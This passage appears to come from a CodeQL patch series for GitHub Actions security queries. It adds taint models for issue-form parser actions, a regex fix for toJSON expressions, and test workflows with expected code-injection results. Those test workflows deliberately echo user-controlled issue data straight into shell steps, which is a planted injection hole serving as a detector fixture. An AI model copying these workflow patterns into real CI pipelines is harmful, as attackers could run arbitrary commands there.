Oct 2024 10:59:05 +0100 Subject: [PATCH 653/707] feat: add source model for peter-murra/issue-forms-body-parser --- ...r-murray_issue-forms-body-parser.model.yml | 6 ++++++ .../CWE-094/.github/workflows/test24.yml | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 4 ++++ .../CWE-094/CodeInjectionMedium.expected | 3 +++ 4 files changed, 32 insertions(+) create mode 100644 ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml new file mode 100644 index 000000000000..14bd9a7875ac --- /dev/null +++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml new file mode 100644 index 000000000000..a90c55df9377 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -0,0 +1,19 @@ +on: + issues: + +jobs: + test: + runs-on: ubuntu-22.04 + steps: + - name: Run Issue form parser + id: parse + uses: peter-murray/issue-forms-body-parser@v4.0.0 + with: + issue_id: ${{ github.event.issue.number }} + separator: '###' + label_marker_start: '>>' + label_marker_end: '<<' + + - name: Show parsed data JSON + run: | + echo ${{ steps.parse.outputs.payload }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index a862c0901ca7..a3119c0fd75b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -760,6 +763,7 @@ subpaths | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index be14d58737ee..0af7aeb0958e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From d85ca107725fd6f277c614ee7c22d3ebc5ad5ba3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:36:59 +0100 Subject: [PATCH 654/707] fix: account for tojson(expr) expressions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1589b18efb02..e5ad86a226c8 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1636,7 +1636,7 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1677,7 +1677,7 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1721,7 +1721,7 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1780,7 +1780,7 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1815,7 +1815,7 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) From 0211902116d2216877ce7126434cd7475d43f218 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:38:17 +0100 Subject: [PATCH 655/707] models: add models for zentered/issue-forms-parser --- .../codeql/actions/dataflow/FlowSources.qll | 14 +++++++++ ql/lib/codeql/actions/dataflow/TaintSteps.qll | 21 ++++++++++++++ ...zentered_issue-forms-body-parser.model.yml | 6 ++++ .../CWE-094/.github/workflows/test25.yml | 13 +++++++++ .../CWE-094/.github/workflows/test26.yml | 29 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 20 +++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 16 ++++++++++ 7 files changed, 119 insertions(+) create mode 100644 ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fa964f475cf7..2fca425642e7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -361,6 +361,20 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override Event getEvent() { result = this.asExpr().getATriggerEvent() } } +class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { + ZenteredIssueFormBodyParserSource() { + exists(UsesStep u | + u.getCallee() = "zentered/issue-forms-body-parser" and + not exists(u.getArgument("body")) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } +} + class OctokitRequestActionSource extends RemoteFlowSource { OctokitRequestActionSource() { exists(UsesStep u, string route | diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index 80858df909b6..56e2c75123c0 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -91,6 +91,25 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node ) } +/** + * A read of user-controlled field of the zentered/issue-forms-body-parser action. + */ +predicate zenteredIssueFormBodyParserSource(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof ZenteredIssueFormBodyParserSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") + ) and + succ.asExpr() = o + ) +} + /** * A read of user-controlled field of the octokit/request-action action. */ @@ -130,6 +149,8 @@ class TaintSteps extends AdditionalTaintStep { tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or xt0rtedSlashCommandActionTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) or + zenteredIssueFormBodyParserSource(node1, node2) or octokitRequestActionTaintStep(node1, node2) } } diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml new file mode 100644 index 000000000000..1a40a6341183 --- /dev/null +++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml new file mode 100644 index 000000000000..0bd666dc9485 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -0,0 +1,13 @@ +name: Issue Forms Body Parser + +on: issues + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml new file mode 100644 index 000000000000..8648d86983ee --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -0,0 +1,29 @@ +name: Issue Forms Body Parser + +on: + workflow_dispatch: + inputs: + issue_number: + type: string + description: issue number + required: true +env: + GH_TOKEN: ${{ github.token }} + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Fetch the issue + id: read_issue_body + run: + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + with: + body: ${{ steps.read_issue_body.outputs.body }} + + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index a3119c0fd75b..7722e6a21406 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -764,6 +780,10 @@ subpaths | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 0af7aeb0958e..e60664795762 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | 